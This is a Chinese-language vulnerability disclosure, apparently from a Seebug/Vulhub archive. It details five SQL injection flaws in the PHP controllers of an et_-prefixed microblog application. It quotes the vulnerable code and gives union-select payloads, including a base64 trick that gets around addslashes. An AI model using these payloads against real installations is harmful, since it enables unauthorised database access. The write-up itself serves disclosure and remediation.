VULHUB ™

### 简要描述： 过滤不严。 ### 详细说明： 注入1： 在topicaction.class.php中 ``` public function topic() { $keyword=$this->_get('keyword','urldecode');//无过滤 且解码 if ($keyword) { $topic = D('Topic')->where("topicname='$keyword'")->find(); if ($topic) { $isfollow=D('Mytopic')->isfollow($topic['id'],$this->my['user_id']); $topicusers=D('MytopicView')->where("topicid='$topic[id]'")->order('id desc')->limit(9)->select(); //getwidget $widget=M('Topicwidget')->where("topicid='$topic[id]'")->order('`order` ASC')->select(); if ($widget) { foreach ($widget as $val) { $topicwidget[$val['widgettype']][]=$val; } } $this->assign('topicwidget',$topicwidget); } else { $count=$isfollow=0; } ``` $topic = D('Topic')->where("topicname='$keyword'")->find(); 这里 带入查询。 where topicname='keyword'; SELECT * FROM `et_topic` WHERE topicname='aaa' LIMIT 1 构造一下 aaa' and 1=2 union select 1,2,3,user(),5 %23 完美注入。 [<img src="https://images.seebug.org/upload/201402/06145004322c9f954d02b9692a4a4634fd425635.jpg"...

### 简要描述： 过滤不严。 ### 详细说明： 注入1： 在topicaction.class.php中 ``` public function topic() { $keyword=$this->_get('keyword','urldecode');//无过滤 且解码 if ($keyword) { $topic = D('Topic')->where("topicname='$keyword'")->find(); if ($topic) { $isfollow=D('Mytopic')->isfollow($topic['id'],$this->my['user_id']); $topicusers=D('MytopicView')->where("topicid='$topic[id]'")->order('id desc')->limit(9)->select(); //getwidget $widget=M('Topicwidget')->where("topicid='$topic[id]'")->order('`order` ASC')->select(); if ($widget) { foreach ($widget as $val) { $topicwidget[$val['widgettype']][]=$val; } } $this->assign('topicwidget',$topicwidget); } else { $count=$isfollow=0; } ``` $topic = D('Topic')->where("topicname='$keyword'")->find(); 这里 带入查询。 where topicname='keyword'; SELECT * FROM `et_topic` WHERE topicname='aaa' LIMIT 1 构造一下 aaa' and 1=2 union select 1,2,3,user(),5 %23 完美注入。 [<img src="https://images.seebug.org/upload/201402/06145004322c9f954d02b9692a4a4634fd425635.jpg" alt="FLOG87(6(ZPYF746_WNC14Q.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/06145004322c9f954d02b9692a4a4634fd425635.jpg) 注入2： 在settingaction.class.php 中 ``` public function doauth() { $_authmsg=daddslashes($_GET['auth']); $authmsg=base64_decode($_authmsg); $tem=explode(":",$authmsg); $send_id=$tem[0]; $user=M('Users'); $row = $user->field('mailadres,auth_email')->where("user_id='$send_id'")->find(); if ($_authmsg==$row['auth_email']) { $user->where("user_id='$send_id'")->setField('auth_email',1); setcookie('setok', json_encode(array('lang'=>L('mail6'),'ico'=>1)),0,'/'); } else { setcookie('setok', json_encode(array('lang'=>L('mail7'),'ico'=>2)),0,'/'); } header('location:'.SITE_URL.'/?m=setting&a=mailauth'); } ``` $_authmsg 虽然用addslashes 进行处理后 但是 后面解码。 所以 无视过滤。 然后切割成数组 数组的第一个 带入查询。 $row = $user->field('mailadres,auth_email')->where("user_id='$send_id'")->find(); where user_id = '$send_id' 完美注入。 无视Gpc 首先编码一下 然后注入 SELECT `mailadres`,`auth_email` FROM `et_users` WHERE user_id='yu' union select user(),2#' LIMIT 1 [<img src="https://images.seebug.org/upload/201402/0615074973ac532bf8dc102c1712ccfaa9119595.jpg" alt="F2)_R}R{VZDIMRLUG3NUO0U.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/0615074973ac532bf8dc102c1712ccfaa9119595.jpg) 完美注入。 注入3： 在messageaction.class.php中。 ``` public function show() { $uid=$_GET['uid']; $mes=M('Messages'); $count = $mes->where("(senduid='".$this->my['user_id']."' AND sendtouid='$uid') OR (senduid='$uid' AND sendtouid='".$this->my['user_id']."')")->count(); $p= new Page($count,20); $page = $p->show('message/show/uid/'.$uid.'/p/',1,'action-for="stream"'); $data = D('MessagesView')->where("(senduid='".$this->my['user_id']."' AND sendtouid='$uid') OR (senduid='$uid' AND sendtouid='".$this->my['user_id']."')")->order("message_id DESC")->limit($p->firstRow.','.$p->listRows)->select(); ``` $uid 无过滤 直接带入了查询。 $count = $mes->where("(senduid='".$this->my['user_id']."' AND sendtouid='$uid') OR (senduid='$uid' AND sendtouid='".$this->my['user_id']."')")->count(); SELECT COUNT(*) AS tp_count FROM `et_messages` WHERE (senduid='2' AND sendtouid='aaaa' AND sendtouid='2') LIMIT 1 执行的sql 构造一下语句。 [<img src="https://images.seebug.org/upload/201402/061511152b1661b012b522e75f07a57dac3721ce.jpg" alt="LW7K~MBNXK3$B[0G2RNQWHX.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/061511152b1661b012b522e75f07a57dac3721ce.jpg) 有图有真相。 注入4： 在photoaction.class.php中 ``` public function show() { $cid=$_GET['cid']; $content=D('ContentView')->where("content_id='$cid' AND FIND_IN_SET('p',filetype)")->find(); if (!$content) { $this->display('nophoto'); exit; } $cModel=M('Content'); $count=$cModel->where("user_id='$content[user_id]' AND FIND_IN_SET('p',filetype)")->count(); ``` $cid 无过滤 且直接带入了 where("content_id='$cid' AND FIND_IN_SET('p',filetype)")->find(); content_id=$cid SELECT Content.content_id AS content_id,Content.content_body AS content_body,Content.posttime AS posttime,Content.type AS type,Content.filetype AS filetype,Content.retid AS retid,Content.replyid AS replyid,Content.replytimes AS replytimes,Content.zftimes AS zftimes,Content.pinbi AS pinbi,Content.zhiding AS zhiding,Content.praisetimes AS praisetimes,Plugins.name AS appname,Plugins.directory AS directory,Plugins.available AS available,Plugins.type AS apptype,Users.user_id AS user_id,Users.user_name AS user_name,Users.nickname AS nickname,Users.user_head AS user_head,Users.user_auth AS user_auth,Users.provinceid AS provinceid,Users.cityid AS cityid FROM et_content Content ignore index(replyid) LEFT JOIN et_plugins Plugins ON Content.type=Plugins.directory LEFT JOIN et_users Users ON Content.user_id=Users.user_id WHERE content_id='aaa' AND FIND_IN_SET('p',filetype) LIMIT 1 这个是执行的语句 来构造一下语句。 [<img src="https://images.seebug.org/upload/201402/0615183033c4d9475ba1f9c0a46d25145327b430.jpg" alt="T_T`[DOJ}15T9FRZ`[N@ELP.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/0615183033c4d9475ba1f9c0a46d25145327b430.jpg) 注入成功 有图有真相。 注入5： 在appaction.class.php中 ``` public function applist() { parent::tologin(); import("@.ORG.Page"); C('PAGE_NUMBERS',10); $pvmodel=D('PluginsView'); $keyword=trim(htmlspecialchars($_REQUEST['keyword'])); if (!$keyword) { $count=M('Plugins')->where("available=1 AND (type='app' || type='api')")->count(); $p= new Page($count,20); $page = $p->show("?m=app&a=applist&p="); $app=$pvmodel->where("available=1 AND (type='app' || type='api')")->order("installs DESC")->limit($p->firstRow.','.$p->listRows)->select(); } else { $count=$pvmodel->where("name LIKE '%$keyword%' AND available=1 AND (type='app' || type='api')")->count(); $p= new Page($count,20); $page = $p->show("?m=app&a=applist&keyword=$keyword&p="); $app=$pvmodel->where("name LIKE '%$keyword%' AND available=1 AND (type='app' || type='api')")->order("installs DESC")->limit($p->firstRow.','.$p->listRows)->select(); ``` $KEYWORD为 request 获取的 然后html实体 但是对注入的影响不大。 如果keyword 为true的话就带入 $count=$pvmodel->where("name LIKE '%$keyword%' AND available=1 AND (type='app' || type='api')")->count(); SELECT COUNT(*) AS tp_count FROM et_plugins Plugins LEFT JOIN et_users Users ON Plugins.appauthor=Users.user_id WHERE name LIKE '%yu%' AND available=1 AND (type='app' || type='api') LIMIT 1 所执行的语句 构造一下 [<img src="https://images.seebug.org/upload/201402/061528142fd861a37c45d6b4167f2b960465d2d5.jpg" alt="JQAL[HG0E1O}IAW1}TTL0SN.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/061528142fd861a37c45d6b4167f2b960465d2d5.jpg) 注入成功 有图有真相 ### 漏洞证明：